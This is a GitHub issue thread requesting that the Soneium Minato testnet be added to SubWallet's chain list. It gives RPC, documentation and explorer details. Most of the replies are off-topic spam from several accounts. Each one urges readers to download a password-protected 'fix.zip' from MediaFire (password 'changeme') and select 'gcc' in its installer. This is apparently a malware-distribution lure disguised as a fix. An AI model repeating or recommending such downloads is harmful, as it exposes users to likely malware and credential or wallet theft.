### ISSUE TITLE
[Soneium] Add support for Soneium Testnet

### ISSUE THREAD

**Issue by Mabel-Nguyen** [Koniverse/SubWallet-ChainList#295]
**If this is your first time integrating, the following information is required**
- A short introduction: Sony Block Solutions Labs launches this Ethereum layer-2 solution to empower builders and drive Web3 adoption.
- Document: https://soneium.org/en/docs/
- Social media links ([telegram](https://t.me/SoneiumAnnouncement), [discord](https://discord.gg/soneium), [website](https://soneium.org/))

**If you want to integrate a chain, you would need to provide**
- Name of the blockchain: Soneium Minato
- Type of the blockchain: EVM
- Blockchain providers: https://rpc.minato.soneium.org/
- Metadata of the blockchain: https://docs.soneium.org/docs/builders/overview
- Logo of the blockchain: https://www.figma.com/design/z9s6aLTLoUdjMwoXLyWcPz/01.SubWallet-Project-Logo?node-id=7341-100&t=TTePKDQsfd8tYHBj-4
- Explorer: https://explorer-testnet.soneium.org/

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Sokol142196** [comment]
Resolved in https://github.com/Koniverse/SubWallet-Extension/issues/3518
